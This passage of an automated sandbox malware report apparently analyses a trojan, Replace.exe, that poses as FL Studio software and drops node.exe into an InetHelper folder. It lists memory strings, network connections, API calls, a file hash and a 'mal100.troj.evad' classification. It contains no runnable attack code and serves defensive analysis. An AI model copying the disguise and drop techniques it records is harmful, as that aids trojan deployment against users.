Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flstudio.com
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=vst
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/content/by/
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/externalMediaDlg.html
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/flstudio/callback.html
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/newreleases/?username=%s&productcodes=%s&productversions=%s
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/uploadexplore
Source: node.exe, 0000000F.00000002.2922058838.0000000002050000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451571484.0000000002050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040558F
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB97B08: wcscpy,CreateFileW,CloseHandle,wcscpy,wcscpy,CreateDirectoryW,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_00007FF75FB97B08
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E2B1000 OpenSCManagerW,OpenServiceW,ControlService,GetLastError,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,1_2_6E2B1000
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,13_2_004034A5
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_004034A5
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BB52F00_2_00BB52F0
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BB10540_2_00BB1054
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BC03780_2_00BC0378
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BBD7F10_2_00BBD7F1
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BBD75B0_2_00BBD75B
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BBA8860_2_00BBA886
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD8A3D0_2_00BD8A3D
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BC2B1F0_2_00BC2B1F
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BB9EDE0_2_00BB9EDE
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BC3EC50_2_00BC3EC5
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB08E02_2_00007FF75FBB08E0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBAF7302_2_00007FF75FBAF730
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB936C82_2_00007FF75FB936C8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB993782_2_00007FF75FB99378
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB9FA1C2_2_00007FF75FB9FA1C
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA08182_2_00007FF75FBA0818
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB967A02_2_00007FF75FB967A0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA67882_2_00007FF75FBA6788
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA6EF82_2_00007FF75FBA6EF8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB946A82_2_00007FF75FB946A8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB9D6C82_2_00007FF75FB9D6C8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC06642_2_00007FF75FBC0664
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC2E802_2_00007FF75FBC2E80
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC66882_2_00007FF75FBC6688
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA0DA02_2_00007FF75FBA0DA0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB95442_2_00007FF75FBB9544
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBAACC02_2_00007FF75FBAACC0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBAE4CC2_2_00007FF75FBAE4CC
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA645C2_2_00007FF75FBA645C
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA6B842_2_00007FF75FBA6B84
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBAA3942_2_00007FF75FBAA394
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB92B402_2_00007FF75FB92B40
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB97B082_2_00007FF75FB97B08
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB94AB02_2_00007FF75FB94AB0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA1AB82_2_00007FF75FBA1AB8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB92C82_2_00007FF75FBB92C8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBA02102_2_00007FF75FBA0210
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC29B02_2_00007FF75FBC29B0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBBD1842_2_00007FF75FBBD184
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00404DCC13_2_00404DCC
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00406AF213_2_00406AF2
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_00404DCC20_2_00404DCC
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_00406AF220_2_00406AF2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02134D7123_3_02134D71
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02134F7423_3_02134F74
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 27_2_01EF583027_2_01EF5830
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02252A1530_3_02252A15
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02254F7430_3_02254F74
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02254D7130_3_02254D71
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_022529DD30_3_022529DD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe 79AC7AE94231A392D27F303418E305A60C4194DBBE143C5DEFFC977C7B2E7A78
Source: C:\Users\user\Desktop\Replace.exeCode function: String function: 00BD9176 appears 66 times
Source: C:\Users\user\Desktop\Replace.exeCode function: String function: 00BCC5F0 appears 39 times
Source: FLEngine_x64.dll.2.drStatic PE information: Number of sections : 14 > 10
Source: Replace.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.evad.winEXE@90/28@11/7
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB976CC GetLastError,FormatMessageW,2_2_00007FF75FB976CC
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,13_2_004034A5
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_004034A5
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,13_2_00404850
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E2B10AC CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,GetLastError,FindCloseChangeNotification,1_2_6E2B10AC
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00402104 CoCreateInstance,13_2_00402104
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBAE32C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,2_2_00007FF75FBAE32C
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeFile created: C:\Program Files\Image-LineJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelperJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:120:WilError_03
Source: C:\Users\user\Desktop\Replace.exeFile created: C:\Users\user\AppData\Local\Temp\7zS49DD90FAJump to behavior
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: 7-Zip0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: 7-Zip0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: 7-Zip0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: run.exe0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: 7-Zip0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: %%T\0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: %%T0_2_00BCB658
